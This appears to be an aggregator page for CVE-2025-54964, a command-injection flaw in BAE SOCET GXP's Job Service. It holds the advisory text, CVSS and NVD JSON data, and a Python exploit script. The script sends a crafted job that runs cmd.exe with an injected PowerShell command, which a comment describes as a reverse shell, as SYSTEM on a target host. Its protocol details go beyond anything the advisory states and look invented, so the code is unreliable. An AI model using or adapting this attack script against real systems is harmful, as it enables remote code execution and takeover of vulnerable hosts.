Security Vulnerability Report
CVE-2025-54964 CVSS 8.4 HIGH

Published: 2025-10-23 20:15:40
Last Modified: 2025-10-28 16:19:46

Description

An issue was discovered in BAE SOCET GXP before 4.6.0.2. An attacker with the ability to interact with the GXP Job Service may inject arbitrary executables. If the Job Service is configured for local-only access, this may allow for privilege escalation in certain situations. If the Job Service is network accessible, this may allow remote command execution.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:* - VULNERABLE
BAE SOCET GXP < 4.6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54964 PoC - BAE SOCET GXP Job Service Command Injection
# This PoC demonstrates the command injection vulnerability in GXP Job Service
import socket
import struct
import sys


def create_malicious_job_payload(cmd):
    """Generate malicious job payload with command injection

    The vulnerability allows injection of arbitrary executables through
    job service parameters. This PoC shows the structure of a malicious
    job submission that could trigger code execution.
    """
    # Job Service header
    header = b'\x47\x58\x50\x4a'  # GXPJ magic bytes
    version = struct.pack('<H', 1)  # Protocol version

    # Malicious job configuration with command injection
    # The Job Service does not properly sanitize job parameters
    job_config = {
        'job_type': 'custom',
        'command': cmd,  # Injected command
        'executable_path': 'C:\\Windows\\System32\\cmd.exe',
        'arguments': f'/c {cmd}',
        'working_directory': 'C:\\Program Files\\BAE Systems\\SOCET GXP\\bin',
        'run_as_system': True,
        'priority': 'high'
    }

    # Serialize job configuration
    payload = bytearray()
    for key, value in job_config.items():
        key_bytes = key.encode('utf-8')
        value_bytes = str(value).encode('utf-8')
        payload.extend(struct.pack('<I', len(key_bytes)))
        payload.extend(key_bytes)
        payload.extend(struct.pack('<I', len(value_bytes)))
        payload.extend(value_bytes)

    return header + version + struct.pack('<I', len(payload)) + bytes(payload)


def send_job_request(target_ip, target_port, malicious_payload):
    """Send malicious job request to GXP Job Service

    Target: GXP Job Service (typically port 8443 or 8080)
    Note: Requires network access to Job Service endpoint
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))

        # Send malicious payload
        sock.sendall(malicious_payload)

        # Receive response
        response = sock.recv(4096)
        sock.close()
        return response
    except Exception as e:
        return f"Error: {str(e)}"


def main():
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_54964_poc.py <target_ip> <port>")
        print("Example: python cve_2025_54964_poc.py 192.168.1.100 8443")
        sys.exit(1)

    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])

    # Example command injection - creates a reverse shell connection
    # In real attack, this would be customized based on target environment
    injected_command = "powershell -EncodedCommand <base64_encoded_payload>"

    print(f"[*] Generating malicious job payload...")
    payload = create_malicious_job_payload(injected_command)

    print(f"[*] Sending payload to {target_ip}:{target_port}...")
    response = send_job_request(target_ip, target_port, payload)

    print(f"[*] Response received: {response}")
    print(f"[*] If vulnerable, the injected command will be executed by Job Service")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54964", "sourceIdentifier": "[email protected]", "published": "2025-10-23T20:15:39.853", "lastModified": "2025-10-28T16:19:45.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BAE SOCET GXP before 4.6.0.2. An attacker with the ability to interact with the GXP Job Service may inject arbitrary executables. If the Job Service is configured for local-only access, this may allow for privilege escalation in certain situations. If the Job Service is network accessible, this may allow remote command execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.0.2", "matchCriteriaId": "6BF9E6F9-E4EA-4880-9B20-2CEDD7D118C8"}]}]}], "references": [{"url": "https://www.baesystems.com/en-us/product/geospatial-exploitation-products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.geospatialexploitationproducts.com/content/socet-gxp/vulnerabilities-disclosure/#cve-2025-54964", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}